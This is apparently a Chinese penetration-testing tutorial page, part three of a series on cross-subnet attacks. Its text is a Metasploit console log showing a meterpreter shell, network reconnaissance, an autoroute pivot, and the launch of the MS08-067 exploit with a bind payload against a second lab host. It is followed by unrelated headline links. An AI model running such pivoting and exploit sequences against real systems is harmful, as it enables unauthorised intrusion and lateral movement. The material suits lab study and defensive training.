Windows网络服务渗透测试实战-跨网段攻击( 三 ) _跨网段

[+] 192.168.43.99:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > shell
Process 7924 created.
Channel 1 created.
Microsoft Windows [?汾 6.1.7601]
??????? (c) 2009 Microsoft Corporation???????????????
C:Windowssystem32>chcp 65001
chcp 65001
Active code page: 65001
C:Windowssystem32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter ???????? 2:
Connection-specific DNS Suffix . : localdomain
Link-local IPv6 Address . . . . . : fe80::e970:4199:33c6:f0f3%21
IPv4 Address. . . . . . . . . . . : 192.168.232.145
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.232.2
Ethernet adapter Bluetooth ????????:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Ethernet adapter ????????:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : 240e:468:81:203c:6d7a:d608:7ec3:80e
Temporary IPv6 Address. . . . . . : 240e:468:81:203c:b1e9:713c:1d5d:3a38
Link-local IPv6 Address . . . . . : fe80::6d7a:d608:7ec3:80e%11
IPv4 Address. . . . . . . . . . . : 192.168.43.99
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::284a:4a93:2ef9:661b%11
192.168.43.1
Tunnel adapter isatap.{D0C9B1FF-3866-45AB-BD3C-6BCCE51D708F}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter isatap.{AA43B9EC-6828-4E2A-ACED-837F5FF4C2C8}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter isatap.localdomain:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:Windowssystem32>arp -a
arp -a
Interface: 192.168.43.99 --- 0xb
Internet Address Physical Address Type
192.168.43.1 12-2b-33-95-ca-ca dynamic
192.168.43.89 00-0c-29-68-f4-d1 dynamic
192.168.43.107 50-e0-85-a8-bc-86 dynamic
192.168.43.162 50-e0-85-a8-bc-86 dynamic
192.168.43.170 50-e0-85-a8-bc-86 dynamic
192.168.43.223 c0-3c-59-b9-be-3c dynamic
192.168.43.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
255.255.255.255 ff-ff-ff-ff-ff-ff static
Interface: 192.168.232.145 --- 0x15
Internet Address Physical Address Type
192.168.232.1 00-50-56-c0-00-08 dynamic
192.168.232.2 00-50-56-fb-6f-4e dynamic
192.168.232.128 00-0c-29-52-81-07 dynamic
192.168.232.254 00-50-56-e3-a4-9f dynamic
192.168.232.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
239.255.255.250 01-00-5e-7f-ff-fa static
255.255.255.255 ff-ff-ff-ff-ff-ff static
C:Windowssystem32>exit
meterpreter > run autoroute -s 192.168.232.128/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.232.128/255.255.255.0...
[+] Added route to 192.168.232.128/255.255.255.0 via 192.168.43.99
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.232.128 255.255.255.0 Session 1
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_eternalblue) > search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.232.128
rhost => 192.168.232.128
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] 192.168.232.128:445 - Automatically detecting the target...
[*] 192.168.232.128:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.232.128:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)

Windows网络服务渗透测试实战-跨网段攻击( 三 )

推荐阅读

向佐回应未陪郭碧婷待产|人家好着呢！向佐回应未陪郭碧婷待产郭碧婷预产期是什么时候

粉红谎言|《粉红谎言》女四女五同时加入，男二拒绝女四邀约，女三谎言公开

抚州公租房买卖政策-抚州公租房管理办法

现货|年内现货铝价首破万五大关行业利润升至历史高位

第2次问:北京哪个公园的猫比较多

Boos游戏解说|LOL男枪你玩明白了？黄金出攻击，钻石堆暴击，职业：必出它！

直播引流的3大策略拼多多直播怎么推广引流

央行数字货币，一场关于“钱”的革命

什么是集合(高等数学什么是集合和元素)

LOL嘴强老司机|小钰世界赛首秀！身材苗条人又可爱！粉丝不满：太瘦了要多吃点！

贾玲@录制《王牌》节目时，贾玲有三次错愕和不快，都源于对方的低情商

上海松江区政府|长三角G60科创走廊为创新驱动发展带来强劲动力和显著优势我区高新技术企业数量三年翻番

问董秘|以及公司当前提振股价的必要性，建议公司尽早公...，投资者提问：基于上述众多利好

360太流氓,电脑杀毒有什么好的杀毒软件? 360杀毒软件好用不

云南凤牌红茶价格,凤牌红茶中国红价格

电影|一起来乘“疯”破浪笑破沧海，畅游西海岸吧

魔法|《创造与魔法》烤茄子配方一览

【大数据文摘】入职第一年我都做了些什么？，从全栈工程师到数据科学家

“才高八斗”由什么典故而来？

消防监督员方舱医院上岗半天家属“闹情绪”了